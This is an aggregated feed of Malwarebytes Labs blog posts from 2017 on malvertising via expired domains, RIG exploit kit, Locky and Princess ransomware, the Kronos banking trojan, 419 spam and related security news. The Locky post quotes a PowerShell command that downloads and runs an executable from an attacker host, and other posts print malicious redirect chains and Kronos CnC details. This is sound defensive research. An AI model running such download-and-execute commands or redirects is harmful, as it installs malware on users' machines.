Techie Feeds

Expired domain names and malvertising

Malwarebytes - Tue, 09/05/2017 - 15:00

In Q1 and Q2 of 2017, we noticed a sharp decline in drive-by downloads coming from compromised websites. The campaigns of the past are either gone (Pseudo Darkleech) or have changed focus (EITest using social engineering techniques).

Malvertising – which has remained steady and is currently the main driving force behind some of the most common malware and scam distribution operations- not only stems from various publishers but also from ‘abandoned’ websites. Those related domains once served a legitimate purpose but were never renewed by their owners and fell into the hands of actors looking to make a quick profit using questionable practices.

In this post, we take a look at how malicious redirections from expired domains work and what kind of traffic they lead to.

The life, death, and resurrection of a domain name

Most issues when it comes to web security don’t usually come from the platforms themselves but from the people that run them or from properties that have simply been relinquished. The folks over at Sucuri have written about this extensively and in a recent post, they showed how expired domains and outdated plugins in popular CMS were a deadly mix, resulting in malicious redirects.

Here is an example of a website, oezelotel[.]com first registered to on 03/10/2014, that once was advertising various hotels, was wiped in 2016, and eventually got parked as its domain name registration was never renewed.

Figure 1: Evolution of a website over time and its eventual expired domain name

New owner, clear motive

A historical whois on the parked domain courtesy of Hyas’ Comox shows that on June 4, 2017, the domain name changed hands from its original owner to This is also when the site changed hosting (moving from a Germany based server to a US one) and began exhibiting its malicious behavior.

A cursory review of some other properties owned by the same registrant indicates a penchant for going after expired domains and monetizing them via dubious ad networks. DomainTools has over 23 K records belonging to that same email address.

Malvertising roulette

You might think a non-existent site is harmless but this couldn’t be further from the truth. Abandoned or forgotten domains are often registered and ‘parked’ to generate low-quality traffic (i.e. spammy links) as described in yet another blog post from Sucuri, and it is a real – lucrative – business model.

We observed different types of traffic, ranging from bogus surveys to more nefarious activity such as drive-by attacks and tech support scams, based on a visitor’s user agent. Note that the following examples did not require users to click on any link, the simple fact of visiting the site triggered an automatic redirection.

RIG EK Flow:

Figure 2: RIG exploit kit infection chain via the Fobos campaign that delivers the Bunitu Trojan.

oezelotel[.]com (parked site) -> xml1.limeclick[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://xml1.limeclick[.]com /click?i=SXRzS*SmiP4_0';</script></body></html> xml1.limeclick[.]com -> bingfreegames3[.]info <iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ ssl/index.php?ps=49506017476' width='313' height='313' dir='0' ></iframe> 212kjhguihkhbvd[.]cf -> (RIG EK landing) <iframe id="91130118" width=278 double="1" height=278 src= "http://188.225.27[.]234/?NTkwNTc2&mano={redacted}" > </iframe> Tech Support Scam (TSS) flow:

Figure 3: Redirection to tech support scam via blobar[.org]

oezelotel[.]com (parked site) -> bougainvillaeabuffeting[.]com <html><head><title>Loading</title></head> <body><script>location.href='http://bougainvillaeabuffeting[.]com/d/ r5t9b73131?rtb={redacted}&';</script></body></html> bougainvillaeabuffeting[.]com -> blobar[.]org document.write('<META http-equiv="refresh" content="0;url='+u+'">'); </SCRIPT><NOSCRIPT><META http-equiv="refresh" content="0;url={redacted}&"></NOSCRIPT> <META name="referrer" content="no-referrer"> blobar[.]org -> www.alrtsyscalling[.]cf (TSS landing) Location: https://www.alrtsyscalling[.]cf/call-microsoft-support-at-1-855-633-1666

Figure 4: Browser locker serving a tech support scam page (IP address is hard coded in picture)

Traffic and user targeting

These days it seems irrelevant how malicious actors get their leads, so long as they are genuine users they can expose to malware or scams. An advantage of using ad networks and malvertising is that a lot of the filtering can be handled throughout the distribution chain, with remarkable efficiency, compared to server side checks on compromised sites.

Parked domains are one of many scenarios of hijacking traffic and monetizing it. While those practices raise eyebrows, are they actually illegal? Is it something that domain name registrars should enforce or ban? Those are interesting questions worth debating.

Malwarebytes blocks a lot of domains associated with malvertising as well as drive-by download attempts. Because we are witnessing more and more social engineering attacks, we highly recommend you spread the word about one of the most common scams today, the tech support scam.

The post Expired domain names and malvertising appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 28 – September 3)

Malwarebytes - Mon, 09/04/2017 - 17:00

Last week, we looked at what actions Kronos can perform in the final installment of a 2-part post. We also dived into Locky, again, a ransomware that just made a comeback, and found that its latest variant (as of this writing) has anti-sandboxing capabilities. This means that once Locky has determined that it’s residing in a virtual machine, it will not perform to its full functionality.

Our researchers also talked about a new 419 spam, malware vaccination tricks, malvertising, and insider threats.

Lastly, Senior Security Researcher Jérôme Segura uncovered a new RIG exploit kit campaign that drops the PrincessLocker ransomware via drive-by download.

Mobile Menace Monday: Implications of Google Play Protect

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers
  • Scammers Already Taking Advantage Of Hurricane Harvey, Registering Domains. “The Better Business Bureau said it has already seen sketchy crowdfunding efforts and expects the coming months to see the usual flood of ‘storm chasers’ — ranging from legitimate contractors looking for business to scammers attempting to take advantage of those who’ve already been victimized by the storm. In addition, US-CERT is warning users “to remain vigilant for malicious cyber activity seeking to capitalize on interest in Hurricane Harvey.” (Source: Cyber in Sight)
  • IRS Warns of Emails Spreading Ransomware. “The Internal Revenue Service (IRS) is warning US citizens of a new phishing scheme that poses as official IRS communications in the hopes that victims access a link, download a file, and hopefully get infected with ransomware.” (Source: Bleeping Computer)
  • USB Malware Implicated in Fileless Attacks. “In early August we discussed a case where a backdoor was being installed filelessly onto a target system using a script that abused various legitimate functions. At the time, we did not know how the threat arrived onto the target machine. We speculated that it was either downloaded by users or dropped by other malware. We recently learned the exact arrival method of this backdoor. As it turned out, we were wrong: it was neither dropped nor downloaded. Instead, it arrived via USB flash disks.” (Source: Trend Micro’s TrendLabs Security Intelligence Blog)
  • FDA Approves Firmware Fix for St Jude Pacemakers. “Abbott-owned St Jude Medical was at the center of a legal storm last year after suing security firm MedSec and short seller Muddy Waters for publishing what it claimed to be false info about bugs in its equipment. It argued this strategy helped them make money off the stock market when shares in St Jude inevitably fell on the news. However, since then the firm has been forced to address some of the issues highlighted by MedSec by releasing security fixes for some products, as it did in January.” (Source: InfoSecurity Magazine)
  • Attackers Exploited Instagram API Bug To Access Users’ Contact Info. “Instagram has confirmed that ‘one or more individuals obtained unlawful access to a number of high-profile Instagram users’ contact information — specifically email address and phone number — by exploiting a bug in an Instagram API.’ Apparently, no account passwords were exposed.” (Source: Help Net Security)
  • Phishing Emails Undetected by 97 Percent of People. “Today, phishing emails are behind 97 percent of cyber attacks, yet recent research reveals 97 percent of people cannot identify those phishing scams, putting the companies they work for at risk. In fact, out of 5,000 emails, one of them is likely to be a phishing email that causes damage. Victims may not know they’ve become one for up to a year.” (Source: Inside Counsel)
  • New Authentication Methods Help Companies To Ditch Passwords. “Most people now recognize that passwords alone are flawed as a means of securing systems. The problem is that there are lots of options when it comes to finding a better way of doing things. Access control specialist SecureAuth is helping the move towards a passwordless world with the introduction of additional multi-factor authentication (MFA) methods, including Link-to-Accept via SMS or email, and YubiKey, the FIDO Universal Second-Factor (U2F) security key by Yubico.” (Source: Beta News)
Latest updates for Businesses
  • Strains Of Mutant Malware Increasingly Evading Anti-Virus To Rob Bank Accounts, Says Akouto. “An analysis of recent attacks finds a sharp increase in the use of new strains of malware capable of bypassing traditional anti-virus according to cybersecurity experts from Akouto. The majority of the analyzed attacks aimed to harvest confidential information and steal money through online banking fraud.” (Source: Payment Week)
  • Ransomware is Going More Corporate, Less Consumer. “Ransomware deployed as worms tends to hit companies far harder than consumers, given that malicious malware can shoot through corporate networks with great speed. Consumers, on the other hand, are usually not connected to a network. As a result, WannaCry and Petya helped push corporations to account for 42% of all ransomware incidents in the first half of the year, compared to 30% of ransomware incidents for all of last year and 29% in 2015, according to the report.” (Source: Dark Reading)
  • SMBs Beware! This Is How Automated Software Updates Spread Malware. “You’re surfing the web, and suddenly a pop-up appears asking you to update a piece of software on your computer. Today, we should all be canny enough to hesitate before clicking ‘install’. We know that there is a good chance that this is malware and that what we will be downloading could put the future of our business at risk. However, what happens when we’re not given a choice? Can we always trust the seemingly routine automatic updates our computers receive, even when their certificate seems to be OK? The answer is no.” (Source: Computing.Co.UK)
  • Hacking Retail Gift Cards Remains Scarily Easy. “After years of examining the retail gift card industry following that initial discovery, Caput plans to present his findings at the Toorcon hacker conference this weekend. They include all-too-simple tricks that hackers can use to determine gift card numbers and drain money from them, even before the legitimate holder of the card ever has a chance to use them. While some of those methods have been semi-public for years, and some retailers have fixed their security flaws, a disturbing fraction of targets remain wide open to gift card hacking schemes, Caput says. And as analysis of the recently defunct dark web marketplace AlphaBay shows, actual criminals have made prolific use of those schemes too.” (Source: Wired)
  • Payment security: What are the biggest challenges? “With cybercrime on the increase, payment card security is increasingly a focus for companies and consumers alike. The Payment Card Industry Data Security Standard (PCI DSS) is there to help businesses that take card payments protect their payment systems from breaches and theft of cardholder data. The findings from the Verizon 2017 Payment Security Report (2017 PSR) demonstrate a link between organizations being compliant with the standard, and their ability to defend themselves against cyberattacks.” (Source: Help Net Security)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (August 28 – September 3) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Insider threats in your work inbox

Malwarebytes - Fri, 09/01/2017 - 16:52

Recently, our friends at Barracuda found a new phishing campaign that banks on the popularity of cloud services used in most businesses, such as Microsoft Office 365.

According to their blog post, this latest scheme takes advantage of the natural trust employees place on messages they receive from colleagues using the correct email address. Dear reader, this campaign is beyond impostor email or business email compromise (BEC). Barracuda is calling it the ‘new insider threat.’

BEC phishing campaigns usually originate outside the target organization. The threat actor creates an email address that may appear like the real thing, just like what we’ve seen here, and then uses it to convince someone in the organization to wire money their way. If a threat actor successfully infiltrates an organization’s email platform on the cloud, then the threat becomes something else. The threat actor has become an identity thief and an insider who is now the biggest threat to any organization. At that point, the possibilities of abuse are endless.

Businesses can combat this new attack by continuous education and awareness efforts. It also pays to add multifactor authentication for additional ways employees can verify their identities before being allowed to access their work emails.


The Malwarebytes Labs Team

The post Insider threats in your work inbox appeared first on Malwarebytes Labs.

Categories: Techie Feeds

RIG exploit kit distributes Princess ransomware

Malwarebytes - Thu, 08/31/2017 - 20:04

We have identified a new drive-by download campaign that distributes the Princess ransomware (AKA PrincessLocker), leveraging compromised websites and the RIG exploit kit. This is somewhat of a change for those tracking malvertising campaigns and their payloads.

We had analyzed the PrincessLocker ransomware last November and pointed out that despite similarities with Cerber’s onion page, the actual code was much different. A new payment page seemed to have been seen in underground forums and is now being used with attacks in the wild.

From hacked site to RIG EK

We are not so accustomed to witnessing compromised websites pushing exploit kits these days. Indeed, some campaigns have been replaced with tech support scams instead and overall most drive-by activity comes from legitimate publishers and malvertising.

Yet, here we observed an iframe injection which redirected from the hacked site to a temporary gate distinct from the well-known “Seamless gate” which has been dropping copious amounts of the Ramnit Trojan.

The ultimate call to the RIG exploit kit landing page is done via a standard 302 redirect leading to one of several Internet Explorer (CVE-2013-2551CVE-2014-6332, CVE-2015-2419, CVE-2016-0189) or Flash Player (CVE-2015-8651) vulnerabilities.

Princess ransomware

Once the exploitation phase is successful, RIG downloads and runs the Princess Ransomware. The infected user will notice that their files are encrypted and display a new extension. The ransom note is called _USE_TO_REPAIR_[a-zA-Z0-9].html where [a-zA-Z0-9] is a random identifier.

The payment page can be accessed via several provided links including a ‘.onion‘ one. Attackers are asking for 0.0770 BTC, which is about $367 at the time of writing.

Down but still kicking

The exploit kit landscape is not what it was a year ago, but we may be remiss to disregard drive-by download attacks completely. Malvertising is still thriving and we are noticing increased activity and changes with existing threat actors and newcomers.

We will update this post with additional information about Princess Locker if there is anything noteworthy to add.

Indicators of compromise

RIG EK gate:

RIG EK IP address:

PrincessLocker binary:


PrincessLocker payment page:


The post RIG exploit kit distributes Princess ransomware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Locky ransomware adds anti sandbox feature (updated)

Malwarebytes - Thu, 08/31/2017 - 16:09

By Marcelo Rivero and Jérôme Segura

The Locky ransomware has been very active since its return which we documented in a previous blog post. There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.

Malwarebytes researcher Marcelo Rivero discovered a trick documented before with the Dridex Trojan [1] employed by Locky’s affiliate ID 5 to bypass automated analysis done via sandboxes.

Malware authors have used booby trapped Office documents containing macros to retrieve their payloads for some time, but ordinarily, the code executes as soon as the user clicks the ‘Enable Content’ button. For analysis purposes, many sandboxes lower the security settings of various applications and enable macros by default, which allows for the automated capture of the malicious payload.

Strikes when you least expect it

However, this particular Locky campaign no longer simply triggers by running the macro itself but waits until the fake Word document is closed by the user before it starts to invoke a set of commands.

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile(‘http://newhostrcm[.]top/admin.php?f=1’, $env:APPDATA + ‘\sATTfJY.exe’); Start-Process $env:APPDATA’\sATTfJY.exe’;

The payload is downloaded and launched from the %appdata% folder followed by the typical ransom note:


While not a sophisticated technique, it nonetheless illustrates the constant cat and mouse battle between attackers and defenders. We ascertain that in their current form, the malicious documents are likely to exhibit a harmless behavior in many sandboxes while still infecting end users that would logically close the file when they realize there is nothing to be seen.

Malwarebytes blocks this ‘closing the document’ trick:

Overall we can mitigate this threat at different layers:

Click to view slideshow.


Indicators of compromise:

Word documents:

b613b1c80b27fb21cfc95fb9cd59b4bb64c9fda0651d5ca05b0b50f76b04c9f4 8ca111f79892cb445c44588f1ade817abcbb3f3e39971f0ef7891b90f09de1e9 23d51440e2325808add6a1e338c697adc10fc0fa6d2ae804cc94af3e725c34cf


newhostrcm[.]top/admin.php?f=1 doctorfeelk[.]top/admin.php?f=1 7cdcb878bf9bf5bb48a0034b04969c74401b25a516078ffd7f721d8098b2a774 933bd8262a34770b06ebe64c800f98d68082c2929af69c3feae7dd4c2aa6a897 References


The post Locky ransomware adds anti sandbox feature (updated) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

BSides Manchester: Malvertising – under the hood

Malwarebytes - Thu, 08/31/2017 - 15:00

I’ve talked about malvertising a fair bit at security events down the years and I was lucky enough to be able to add to the tally at this month’s BSides Manchester conference. Whether your preferred variety is desktop, mobile, or even virtual/augmented reality, there’s hopefully something here for everyone.

“Malvertising: under the hood” covers the following topics:

  • Malvertising definition
  • Publisher/advertiser numbers
  • From old ads to new
  • Fake advertisers and domain shadowing
  • Domain imitation
  • Cloned ads
  • Malvertising gateways
  • Bad ad excuses
  • Ad blocking wars
  • Mobile antics
  • VR / AR

Chris Boyd

The post BSides Manchester: Malvertising – under the hood appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malware vaccination tricks: blue pills or red pills

Malwarebytes - Wed, 08/30/2017 - 18:00

First, let me explain what I mean by malware vaccination tricks. Most of you will have heard about some of these. Vaccination tricks are in fact techniques that use safety checks done by malware against that same malware. The malware checks for the presence of certain files or registry keys as a sign that the machine should not be infected. And users make sure those keys or files are present as a security measure.

Examples of safety checks
  • A lot of malware contains routines to check whether it is running on a Virtual Machine (VM), sandbox or with a debugger. They do this to avoid being detected by many of the automated systems the AV industry uses to deal with the large numbers of malware that surface every second of the day.
  • Some malware check the default language installed on the affected system or the keyboard language. They do this because they shy away from infecting systems in certain countries, or quite the opposite because they target certain countries.
  • Certain types of malware check whether they have already infected a certain machine by creating a certain registry key or dropping a certain file. They do this to avoid problems, conflicts, and monitoring. Especially certain families of ransomware are known to do this.
  • Online checks are another form of testing whether a machine could be run by analysts. The most famous example must be WannaCry.
  • Canary file checks are another type of check, mostly done by ransomware. In these cases, the canary files are files that trigger an alarm as soon as they are being changed. They are designed to alert users that there might be an active ransomware infection, which is encrypting files.
  • Software checks are done to avoid infecting machines that might be recording, debugging, or sending telemetry. Some exploit kits, for example, do not infect machines that are running Malwarebytes to avoid showing up in our telemetry. Other popular software they avoid is Wireshark, which is often used by analysts to capture network traffic.
So how could we use this knowledge? Red pills
  • Installing security software like Malwarebytes and others is obviously a good idea because it not only scares away some malware, but it is foremost an excellent security software.
  • If you can live with the lowered specs that are a result of using virtual machines and sandboxes, this is another good idea to enhance your security. If you use your VM right you can go back to a recent image in case of an emergency. And sandboxes can keep accidents contained within a limited environment.
Blue pills
  • Changing your default language is an option that I would not recommend for people that are not fluent in the language they are installing. From personal past experiences, using different languages side by side on a Windows system can cause Babylonian language confusions on your system.
  • Adding certain registry keys if you are afraid of a particular infection doesn’t hurt your system much, but they are no guarantee for permanent vaccination. If we all start adding HKEY_CURRENT_USER\Software\Locky to our registry, the malware authors will soon design another check and none of us would be protected anymore after they changed it.
  • Adding a keyboard layout that you never plan on using, is a rather harmless method unless you have a tendency to hit two adjoining keys on regular bases (Ctrl+Shift changes the keyboard layout to the next option you have installed). Besides that, most malware use more refined methods to check where you are from.

Some knowledge is good to have and we would like to thank all the researchers for sharing what they found. But the methods that some vaccines require are of no real use unless you are especially afraid of one certain type of malware. There are so many ways for malware to check whether it is running on a VM that it is almost impossible to “fake” all of them so you would have to know what type of check the malware, you are afraid of most, is using. IMHO the same is true for putting all kinds of files on your system that will supposedly stop ransomware from encrypting your files. Some of these vaccines are so much work they would require automation IMHO, like putting a malformed image in every directory holding files which you don’t want to be encrypted by Cerber.


Sometimes vaccines against certain malware are offered by researchers that point out a method you can use to protect against a particular form or variant of malware. We are not saying that these methods do not work, but we would like to point out that applying all these vaccines can easily turn into a full-time job and you still wouldn’t be protected adequately. It is better to make sure your systems are really protected and easily restored than to clutch at every little straw you are offered.

Hint for those that didn’t get the pills reference: “What would Neo do?”

Take care out there and safe surfing.

Pieter Arntz

The post Malware vaccination tricks: blue pills or red pills appeared first on Malwarebytes Labs.

Categories: Techie Feeds

419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola”

Malwarebytes - Tue, 08/29/2017 - 17:10

I’m not saying an email claiming to be from the “Central Bank of Nigeria” with a contact handler named “Rev. Goodluck Ebola” will raise too many red flags, but…

Click to Enlarge

Zaria Street, Off Samuel Akintola
Street,Garki 11, Garki-Abuja.

Our Ref: FGN/CBN/NIG/01/2017.

Your Ref………………………….

From The Desk Of Mr. Godwin Emefiele.
Governor, Central Bank of Nigeria (CBN)

SUBJECT: Dear Valued Customer.

Dear Friend,

We wish to inform you that your unclaimed payment of USD$10.5 Million in Africa has been released and ready to be paid to you via PREPAID VISA CARD which you will use to withdraw the US$10.5 Million from any ATM Machine in any part of the world.

We have mandated UBA financial advicers Ghana, to send you the ATM CARD and PIN NUMBER which you will use to withdraw all your US$10.5Million Dollars in any ATM SERVICE MACHINE in any part of the world, but the maximum you can withdraw in a day is US$20,000.00 Only.

You are therefore advice to contact the Head of ATM CARD Department of UBA financial advicers Ghana;

Contact Person: Rev. Goodluck Ebola,
Office email address: [snip]

Tell Rev. Goodluck Ebola, that you received a message from the CENTRAL BANK OF NIGERIA. Instructing him to send you the ATM CARD and PIN NUMBER which you will use to withdraw your USD$10.5 Million Dollars in any ATM SERVICE MACHINE in any part of the world, also send him your direct phone number and contact address where you want him to send the ATM CARD and PIN NUMBER to you.

We are very sorry for the plight you have gone through in the past years.

Thanks for adhering to this instruction and once again accept our congratulations.

Best Regards.

Mr. Godwin Emefiele.
Executive Governor,
Central Bank of Nigeria (CBN).

…I think I just hand stitched fifteen thousand red flags and hung them up around a printout of this email. That this comes from an entirely unrelated .jp (Japan) email address is the icing on the scam sandwich cake. This is indeed a 419 attempt and all that likely waits for you at the other end is:

  • All your money stolen
  • Your bank account used in a money mule scam
  • The sweet embrace of jailtime

Your career as a money mule may also be short lived, assuming the police don’t get you first.

What’s particularly curious here is we’ve primarily seen this one bouncing around via “Rev. Goodluck Egobia” instead of “Ebola”, so we’re not sure if this is an error, a joke, or someone at the spam factory just got bored. Either way, you should avoid replying to any emails similar to the above as it’s 100% guaranteed to be fake.


Chris Boyd

The post 419 spam: 10 million US dollars, courtesy of “Rev. Goodluck Ebola” appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Inside the Kronos malware – part 2

Malwarebytes - Tue, 08/29/2017 - 15:00

In the previous part of the Kronos analysis, we took a look at the installation process of Kronos and explained the technical details of the tricks that Kronos uses in order to remain more stealthy. Now we will move on to look at the malicious actions that Kronos can perform.

Analyzed samples

Special thanks to @shotgunner101 and @chrisdoman for sharing the samples.

Configuration and targets

Kronos is known as a banking Trojan. For the purpose of enabling and configuring this feature, the bot may download from its CnC additional configuration file. After being fetched, it is stored in the installation folder in encrypted form. (It is worth to notice that when the config is sent over the network it is encrypted using AES CBC mode – but when it is stored on the disk, AES in ECB mode is used.)

Below you can see an example of the installation folder of Kronos, created in %APPDATA%/Microsoft. The folder name is further used as a BotId. Both stored files, the executable and the configuration, has the same name that differs only by the extension:

Here you can see the captured configuration file in a decrypted form:

The format of the configuration follows the standard defined by the famous Zeus malware.

The config specifies the external script that is going to be injected in the targeted website, as well as the place of the injection. Below you can see a fragment of the configuration for a sample target – Wells Fargo Bank:

In the given example, the injected script is figrabber.js

It is hosted on the server of the attacker:

The current configuration targets several banks, but also steals credentials for popular services like Google, Twitter, and Facebook.

Indeed, if we open the websites that are targeted by the malware we can see that the injects has been performed. The fragments of code that were defined in the config are implanted in the source of a legitimate website. Some examples included below:



The injected scripts are responsible for opening additional pop-up that is trying to phish the user and steal his/her personal data:

Wells Fargo:

More cases, and their comparison with a normal site behavior before the infection, demonstrated on the video:

The form is customized to fit the theme of each page. However, its content is the same for each target. Overall, the attack is not very sophisticated and it will probably look suspicious to the more advanced users. It’s based purely on social engineering – trying to convince a user to input all personal data that are necessary for banking operations:


Apart from infecting browsers and stealing the data, Kronos also has a downloader feature. During our tests, it downloaded a new executable and saved it in the %TEMP%. Payloads are stored in the additional directory with the same name as the main installation directory:

Downloaded payload:

6f7f79dd2a2bf58ba08d03c64ead5ced – nCBngA.exe

The payload is downloaded from Kronos CnC:

…in unencrypted form:

In the analyzed case, downloaded payload was just an update of the Kronos bot. However, the same feature may also be used for fetching and deploying other malware families.

Command and Controll (CnC) server

In the analyzed case, Kronos used Fast-Flux technique for it’s CnC. The domain was resolved to a different IP each time. For example, the domain was resolved to an IP address randomly picked from the pool given below:

Watching the communication with the CnC, we observed queries to the site connect.php, with an optional parameter a:

connect.php - initial beacon connect.php?a=0 - sending data to the CnC connect.php?a=1 - downloading the configuration form the Cnc CnC panel

Thanks to the code of the CnC panel that leaked online, we can have more insights on all the functionalities and their implementation. Like most of the malware panels, the Kronos panel is written in PHP and uses MySQL database. Overview of the files:

It turns out, that in total the bot has three commands:

  • a=0 – sends the grabbed page content
  • a=1 – fetch the configuration file
  • a=2 – send the logged windows

Below we can see the relevant fragments of the panel’s code (implemented inside connect.php), responsible for parsing and storing the data uploaded by the respective commands.

Command #0 (a=0):

Command #2 (a=2):

The configuration that is sent to the bot is prepared by the following code:

Command #1 (a=1):

We can also see very clearly how the config is encrypted – using AES in CBC mode, where the key is first 16 bytes of md5 of the BotId (it confirms what researchers form Lexsi lab found by reverse engineering).

However, AES is not the only cryptographic algorithm that is utilized by Kronos. Other commands use BlowFish in ECB mode:

Command #0 (a=0):

Command #2 (a=2):

In all cases, there is a variable called UniqueId that is used as a key. The UniqueId is nothing more but the BotId, that is sent in every POST request in XOR encoded form.

You can find the corresponding Python scripts for decoding the appropriate requests and responses here:

Kronos comes also with option of adding some plugins, extending the core functionality:

As we may conclude, the plugins are capable of extending Kronos with some espionage capabilities, such as VNC (for viewing the desktop) and logging typed keystrokes.

Decrypting the communication

With the help of prepared scripts (available here), we can decrypt the important elements of the communication between the Kronos bot and the CnC server. Let’s assume that we have a PCAP file with a captured traffic.

The BotId

We need to start from getting the Kronos BotId, because as we know it will be used to derive the encryption keys. We will find it in the requests sent by the bot to its CnC (74 bytes long):

After dumping the request, we can use the following script to decode it:

./ --infile dump1.bin

As the output we will get the decoded beacon, consisting of:

  1. Hash of the configuration file (if no configuration file was present at the moment, this part will be filled with “X” characters)
  2. The BotId



So, in the demonstrated case the BotId is {117BB161-6479-4624-858B-4D2CE81593A2}.

The configuration

Having the BotId, we can move to decrypt the configuration. It arrives in the response to the a=1 request:

Example of the request followed by the encrypted response from the CnC:

After dumping the response, we can use another script to decode it, giving the BotId as a parameter:

./ --datafile dump2.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

As a result, we will get the configuration file. Example of the decoded config:

The sent reports

Sometimes we can find the Kronos bot reporting to the CnC in requests a=0 or a=2:

Example of the encrypted request:

Finding out what was exactly the data stolen by Kronos is not difficult if we dump the data and use the dedicated script:

./ --datafile dump3.bin --botid {117BB161-6479-4624-858B-4D2CE81593A2}

Example of the decoded report:


In terms of code quality, Kronos is written in a decent way, however it’s features are nothing novel. Although the bot got good reviews on underground forums, in terms of popularity it was always legging behind. Probably it’s relatively high price was the important factor deciding why it lost with the competitors.


See also:

Inside the Kronos malware – part 1

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog:

The post Inside the Kronos malware – part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 21 – August 27)

Malwarebytes - Mon, 08/28/2017 - 17:38

In our blog posts, we announced the introduction of, and explained the necessity for, real-time protection for our Mac and Android users. Also explaining what you can expect them to do for you and answering the questions that we expect to be frequently asked.

We looked at 4 key steps you can take within your business to help gain trust with your employees while educating them to make more secure decisions. And in our “Explained” series we talked about user agent strings and digital forensics.

Below are notable news stories and security-related happenings from last week:

Latest updates for Consumers Latest updates for Businesses


Safe surfing, everyone!

The Malwarebytes Labs Team


The post A week in security (August 21 – August 27) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: Implications of Google Play Protect

Malwarebytes - Mon, 08/28/2017 - 17:00

Along with the recent release of Google’s new OS, Android 8.0 Oreo, they also released a new security suite known as Google Play Protect. As blogged about in July in Play Protect: Android’s new security system is now available, this new suite has been available since mid-May.

To reiterate

As noted in our July blog, the new Find My Phone does exactly what the name implies. You can also lock the phone remotely, display a message on the phone, call the phone through a browser, or even erase all the data on the phone with this feature. I personally hope this will help alleviate the use of shady monitoring apps. There is also Google’s Safe Browsing that stops you before you proceed to an unsafe site via Chrome. This feature has been around for a while.

50 billion apps, oh my!

Of most interest is Google’s security suite is its new scanning capabilities. Google boasts it can scan 50 billion apps daily, and uses machine learning to weed out the bad stuff. For quite some time, Google has been vetting apps before allowing them in the Google Play Store. Until now, they had no way to verify that the apps stayed vetted after install. This new capability allows Google to scan apps after installation, as well. Not only does it scan apps installed from Google Play, but it also scans apps installed from third-party sites.

The ability to scan apps after install will aid in detecting apps that are set to hide their malicious activity for a set amount of time or after an update — i.e., a malicious app may wait a week before doing anything malicious to hide its presence from malware researchers and scanners. Google claims that if an app that was once acting safely is suddenly doing something malicious, it will flag it.

This machine learning you talk about…

The use of machine learning to detect malware is far from a new concept. Regarding malware detection, it typically works by pooling things into two groups — a good group and a bad group. It then learns every trait it can about each group. If anything looks out of the ordinary from the good group and/or displays traits from the bad group, it’s flagged.

I can only assume Google is using anything on Google Play, that per Google “undergo rigorous security testing,” to pool in the good group. If the trait of the app changes from when it was verified to get into Google Play — bam, it’s flagged!

Grey is the new black

This all sounds great, but malware authors are already ahead of the curve. We have seen the rise of apps that lie in the “gray” area or better known as Potentially Unwanted Programs (PUPs).  Rather than making obviously malicious (black) apps, malware authors are creating apps that are rather questionable.

Most come in the form of a PUP subcategory known as adware.  Ads aren’t inherently malicious, and many apps from the Google Play Store have ads to keep the apps free. There’s a thin line between a good ad and what we call adware. If the ad behavior starts acting overly aggressive or does something out of line like collecting overly personal information, it’s considered adware.  The uncertainty of whether an ad is good or not can mean adware can slip into Google Play undetected for long periods of time. If my hunch is correct, these apps would also be in the machine learners “good” group if they made it into Google Play.

Clickers, too

Another concern is the more malicious Trojan.Clicker. This malware simply “clicks” on ad websites in the background repeatedly to gain revenue. The simplicity of the code makes it difficult to detect. Malicious clicker apps have been known to slip into Google Play.

Kudos to Google

I, for one, am very happy to see Google taking more steps to keep users safe. Concerning machine learning, the more data you have, the better it will be at detecting. Google has an abundance of data, which gives me high hopes of its abilities.

As a malware researcher, should I start beefing up my resume to find a new field now that Google is on the case? Not likely as malware authors have and always will find ways around detection. The new scanner will indeed help things, but it certainly isn’t a stop-all for mobile malware. Trust me, if I could retire from the mobile malware industry knowing the world is safe to a less stressful job as a goat herder, I would. Until then, stay safe out there.


Nathan Collier

The post Mobile Menace Monday: Implications of Google Play Protect appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: digital forensics

Malwarebytes - Fri, 08/25/2017 - 15:30
What is it?

Digital forensics is a modern day field of forensic science, which deals with the recovery and investigation of material found in digital devices. When needed, this is often because of a (cyber) crime, whether suspected or established. The most common reasons for performing digital forensics are:

  • attribution
  • identifying a leak within an organization
  • assessing the possible damage that occurred during a breach

The field of digital forensics is divided up into several subdivisions, depending on the nature of the digital device that is the subject of the investigation:

  • computer forensics
  • network forensics
  • forensic data analysis
  • mobile device forensics
What does it take?

Working in this field combines the excitement of solving a puzzle with the data at hand and requires a deep understanding of the software and hardware involved. The most important skill is to be able to find and interpret the data involved in the crime while minimizing the changes made on the investigated device.

Cause and effect can be difficult to determine without a clear timeline, which adds another dimension to the puzzle of trying to figure out what the initial breach factor was and how the attackers proceeded from there.

What does it have in common with cybersecurity?

Cybersecurity and digital forensics are two fields that have a lot in common. They also provide information to each other. Analyzing a breach may lead to new insights about preventing such a breach, and knowing how certain threats work makes it easier to create a timeline and look for a possible attack vector.

Is attribution always possible?

If anything, attribution is always tough. Sometimes, you can recognize a certain way of programming, but there is no way of telling whether that person wrote that piece of code for this purpose or if someone simply copied it. Attribution by meta data is sometimes possible, but experienced cybercriminals are often times too smart to leave evidence behind. Who benefits from the data that were stolen or destroyed is usually a better indicator of who might be responsible, but motive alone does not count in court.


Digital forensics is a science that is closely related to cyber-security. Digital forensic analysts examine data and devices to find out as much as possible about a breach or crime that involved digital devices.


Pieter Arntz

The post Explained: digital forensics appeared first on Malwarebytes Labs.

Categories: Techie Feeds

